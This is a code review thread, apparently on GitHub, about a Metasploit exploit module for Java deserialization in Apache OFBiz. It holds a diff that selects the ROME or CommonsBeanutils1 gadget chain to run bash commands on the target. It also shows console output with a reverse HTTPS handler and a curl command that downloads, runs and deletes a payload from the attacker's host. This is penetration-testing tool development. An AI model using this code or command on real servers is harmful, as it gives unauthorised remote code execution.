modules/exploits/linux/http/apache_ofbiz_deserialization.rb

```diff
@@ -109,10 +123,19 @@ def exploit
   def execute_command(cmd, _opts = {})
     vprint_status("Executing command: #{cmd}")
 
-    res = send_request_xmlrpc(
-      # framework/webapp/lib/rome-0.9.jar
-      generate_java_deserialization_for_command('ROME', 'bash', cmd)
-    )
+    if datastore['AUTHBYPASS'] # assumes ~18.12 or so
+      res = send_request_xmlrpc(
+        # framework/webapp/lib/rome-0.9.jar
+        # used with 18.12 compatible, but not 15.12 compatible
+        generate_java_deserialization_for_command('CommonsBeanutils1', 'bash', cmd) # works against both
+      )
+    else
+      res = send_request_xmlrpc(
+        # framework/webapp/lib/rome-0.9.jar
+        # used with 15.12, but not 18.12 compatible
+        generate_java_deserialization_for_command('ROME', 'bash', cmd)
+      )
+    end
```

Comment:
This is the only place where we explicitly outline the compatibility restraints of the version of Apache Ofbiz with the `datastore['AUTHBYPASS']` option. I feel like we should be more vocal about this. 

If you run the module with default options against a version 15 target the module reports that the exploitation was successful but no session is returned as the wrong gadget chain is used but is not communicated:

```
msf6 exploit(linux/http/apache_ofbiz_deserialization) > run

[*] Started HTTPS reverse handler on https://192.168.123.1:8443
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Target can deserialize arbitrary data.
[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_https
[*] Using URL: http://192.168.123.1:7070/df9nSANH
[+] Successfully executed command: curl -so /tmp/GzJvAvQo http://192.168.123.1:7070/df9nSANH;chmod +x /tmp/GzJvAvQo;/tmp/GzJvAvQo;rm -f /tmp/GzJvAvQo
[*] Command Stager progress - 100.00% done (114/114 bytes)
[*] Server stopped.
[*] Exploit completed, but no session was created.
```

I think we should bail and notify the user if the module is running against version 15 with the `datastore['AUTHBYPASS']` set to true (or running against 18 with the option set to false). 

I think we could use the `/webtools/control/xmlrpc` endpoint to help with this - I know on Ofbiz 18 the version is displayed in the footer. Let me know what you think.

Reply:
i like the idea, i'll see if i can research it in a few days

Reply:
So I was able to find version 17.x, and it also includes the version at the bottom of the page. I'm not a java fan, so the thought of installing this app by hand is less than appealing to me. I think I'll code it in, if we get a 200, check and return version number, if not assume its <16.